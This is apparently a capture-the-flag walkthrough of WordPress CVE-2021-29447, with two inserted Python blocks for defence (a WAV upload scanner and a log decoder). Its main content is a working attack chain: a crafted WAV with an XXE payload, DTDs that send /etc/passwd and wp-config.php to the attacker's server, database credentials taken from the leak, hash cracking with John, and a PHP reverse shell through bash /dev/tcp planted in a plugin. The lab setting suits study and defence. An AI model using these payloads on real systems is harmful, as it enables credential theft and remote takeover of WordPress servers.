WordPress CVE-2021-29447
WordPress login:

```
user: test-corp
password: test
```
Then, on my own machine, create poc.wav (cat poc.wav afterwards to check it):

```
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > poc.wav
```
Remember to replace http://YOURSERVERIP:PORT with your own IP and port, and NAMEEVIL.dtd with the name of your DTD file. Create that DTD file like this:
```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
```
Here too, change the server IP and port to your own details.
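From the defensive side, an upload scanner can reject a WAV shaped like poc.wav before the media library ever parses it: the RIFF container is walked chunk by chunk and any iXML chunk carrying DOCTYPE or entity declarations is flagged. This is an added example, not code from the write-up; the WAV samples, the example.invalid host and the helper names are constructed.

```python
"""Added example (not from the write-up): scan an uploaded WAV for an iXML chunk
that declares a DOCTYPE or entities, which is how the CVE-2021-29447 payload
above carries XXE through the media uploader. The samples below are constructed."""
import re
import struct

# Declarations a benign iXML metadata chunk never needs.
XXE_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY|\bSYSTEM\b|\bPUBLIC\b", re.I)


def iter_riff_chunks(data: bytes):
    """Yield (chunk_id, payload) after the 12-byte RIFF/WAVE header. A declared
    size larger than the remaining file is clamped instead of crashing the scanner."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        start = pos + 8
        end = min(start + size, len(data))
        yield chunk_id, data[start:end]
        pos = end + (size & 1)  # RIFF chunks are padded to even length


def find_xxe_in_wav(data: bytes) -> list:
    """Return the ids of chunks whose body contains DOCTYPE/ENTITY declarations."""
    return [cid.decode("ascii", "replace")
            for cid, payload in iter_riff_chunks(data) if XXE_MARKERS.search(payload)]


def build_wav(chunks) -> bytes:
    """Constructed helper: assemble a minimal RIFF/WAVE file from (id, payload) pairs."""
    body = b"".join(cid + struct.pack("<I", len(p)) + p + b"\x00" * (len(p) % 2)
                    for cid, p in chunks)
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body


# Constructed samples: ordinary iXML metadata, and the DOCTYPE-bearing shape of
# the write-up's payload with a placeholder host.
BENIGN_WAV = build_wav([
    (b"fmt ", struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)),
    (b"iXML", b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>'),
])
MALICIOUS_WAV = build_wav([
    (b"iXML", b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
              b'"http://example.invalid/evil.dtd">%remote;]>\x00'),
])

if __name__ == "__main__":
    print("benign:", find_xxe_in_wav(BENIGN_WAV))        # []
    print("malicious:", find_xxe_in_wav(MALICIOUS_WAV))  # ['iXML']
```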
Now you have all the files. Before uploading, start a PHP server on your machine:

```
php -S 0.0.0.0:1234
```

Then upload poc.wav through the WordPress media section.
After you upload poc.wav, the encoded text arrives in the server log like this:
```
❯ php -S 0.0.0.0:1234
[Fri Oct 10 09:35:06 2025] PHP 8.4.11 Development Server (http://0.0.0.0:1234) started
[Fri Oct 10 09:35:33 2025] 10.201.83.44:41890 Accepted
[Fri Oct 10 09:35:33 2025] 10.201.83.44:41890 [200]: GET /test.dtd
[Fri Oct 10 09:35:33 2025] 10.201.83.44:41890 Closing
[Fri Oct 10 09:35:34 2025] 10.201.83.44:41892 Accepted
[Fri Oct 10 09:35:34 2025] 10.201.83.44:41892 [404]: GET /?p=hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X - No such file or directory
[Fri Oct 10 09:35:34 2025] 10.201.83.44:41892 Closing
```
So you got the information you needed, but it is not readable yet. To decode it into readable text, do this:
nano decode.php

```
<?php echo zlib_decode(base64_decode('BASE64_FROM_LOG'));
```

Replace BASE64_FROM_LOG with the base64 value from the server log, then run the script.
You get:

```
❯ php decode.php
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
stux:x:1000:1000:CVE-2021-29447,,,:/home/stux:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
```
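The capture-and-decode steps above (the `?p=` value in the PHP server log, then decode.php) are what an incident responder reverses when reviewing the WordPress host's outbound requests to work out which file content left the server. This is an added example in Python, not the write-up's code; the log line, the IP address and the file content are constructed. It differs from decode.php in one detail worth knowing: PHP's zlib.deflate filter emits raw DEFLATE, which Python only accepts with negative wbits.

```python
"""Added example (not from the write-up): decode the `?p=` value that the
php://filter chain (zlib.deflate, then convert.base64-encode) sends out, as
decode.php does, so a responder reviewing outbound-request logs can see what
file content left the server. Mirrors PHP zlib_decode()'s format autodetection."""
import base64
import binascii
import re
import zlib

REQ_RE = re.compile(r"GET /\?p=([A-Za-z0-9+/=]+)")


def decode_filter_chain(b64: str) -> bytes:
    """Undo convert.base64-encode, then zlib.deflate. PHP's zlib.deflate filter
    emits raw DEFLATE, so try raw first, then zlib- and gzip-wrapped streams."""
    b64 = b64.strip()
    b64 += "=" * (-len(b64) % 4)  # restore padding lost in a URL or log line
    raw = base64.b64decode(b64, validate=True)
    for wbits in (-15, 15, 31):  # raw deflate, zlib header, gzip header
        try:
            return zlib.decompress(raw, wbits)
        except zlib.error:
            continue
    raise ValueError("not a zlib.deflate payload")


def leaked_content_from_log(log_text: str) -> list:
    """Pull every ?p= parameter out of web-server log lines and decode it;
    undecodable entries become None so their position in the log is kept."""
    out = []
    for m in REQ_RE.finditer(log_text):
        try:
            out.append(decode_filter_chain(m.group(1)))
        except (ValueError, binascii.Error):
            out.append(None)
    return out


# Constructed sample: the filter chain's output for a two-line file, placed in
# a log line shaped like the PHP dev-server output above (IP is made up).
SAMPLE_FILE = b"root:x:0:0:root:/root:/bin/bash\nstux:x:1000:1000::/home/stux:/bin/bash\n"
_c = zlib.compressobj(level=9, wbits=-15)
SAMPLE_B64 = base64.b64encode(_c.compress(SAMPLE_FILE) + _c.flush()).decode()
SAMPLE_LOG = ("[Fri Oct 10 09:35:34 2025] 10.0.0.5:41892 [404]: GET /?p="
              + SAMPLE_B64 + " - No such file or directory\n")

if __name__ == "__main__":
    for blob in leaked_content_from_log(SAMPLE_LOG):
        print(blob.decode() if blob else "<undecodable>")
```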
To get the SQL database info, change the DTD. The original DTD looked like this, which is why you got the /etc/passwd content above:

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.21.16.42:1234/?p=%file;'>" >
```

To get the database info we have to change the DTD file. WordPress stores its database settings in /var/www/html/wp-config.php, so we change the DTD like this:

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/html/wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.21.16.42:1234/?p=%file;'>" >
```
Now start the PHP server again, upload the file, and decode the result as before; you get the database info:

```
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpressdb2' );
/** MySQL database username */
define( 'DB_USER', 'thedarktangent' );
/** MySQL database password */
define( 'DB_PASSWORD', 'sUp3rS3cret132' );
```
Using that username and password, log in to the database:

```
❯ mysql -h 10.201.83.44 -u thedarktangent -p
Enter password:
ERROR 2026 (HY000): TLS/SSL error: Certificate verification failure: The certificate is NOT trusted.
```

Because this error comes up, log in the old way, with TLS turned off:

```
❯ mysql -h 10.201.83.44 -u thedarktangent -p --ssl=0
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 55
Server version: 5.7.33-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
```
After logging in, find the password hash of the other user:

```
corp-001
$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
```
Use John to crack the hash:

```
john hash.txt
Proceeding with wordlist:/usr/share/john/password.lst
teddybear (?)
```
Password found. Log in as the new user and, in the plugin section, add a PHP reverse shell to get a shell. Add this to the plugin's index.php:

```
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.21.16.42/4444 0>&1'");
```
Once in the reverse shell, upgrade to a stable shell and look around:

```
which python3
/usr/bin/python3
www-data@ubuntu:/var/www/html/wp-content/plugins/akismet$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/home$ ls
ls
stux
www-data@ubuntu:/home$ cd stux
cd stux
www-data@ubuntu:/home/stux$ ls -la
ls -la
total 44
drwxr-xr-x 5 stux stux 4096 May 26 2021 .
drwxr-xr-x 3 root root 4096 May 26 2021 ..
-rw------- 1 root root 3359 May 26 2021 .bash_history
-rw-r--r-- 1 stux stux 220 May 26 2021 .bash_logout
-rw-r--r-- 1 stux stux 3771 May 26 2021 .bashrc
drwx------ 2 stux stux 4096 May 26 2021 .cache
-rw------- 1 stux stux 131 May 26 2021 .mysql_history
drwxrwxr-x 2 stux stux 4096 May 26 2021 .nano
-rw-r--r-- 1 stux stux 655 May 26 2021 .profile
-rw-r--r-- 1 stux stux 0 May 26 2021 .sudo_as_admin_successful
-rw-r--r-- 1 root root 183 May 26 2021 .wget-hsts
drwxrwxr-x 2 stux stux 4096 May 26 2021 flag
www-data@ubuntu:/home/stux$ cd flag
cd flag
www-data@ubuntu:/home/stux/flag$ ls
ls
flag.txt
www-data@ubuntu:/home/stux/flag$ cat flag.txt
cat flag.txt
```
You can get the database port from the MySQL session like this:

```
MySQL [information_schema]> SHOW VARIABLES LIKE 'port';
+---------------+-------+
| Variable_name | Value |
+---------------+-------+
| port          | 3306  |
+---------------+-------+
1 row in set (0.366 sec)
MySQL [information_schema]>
```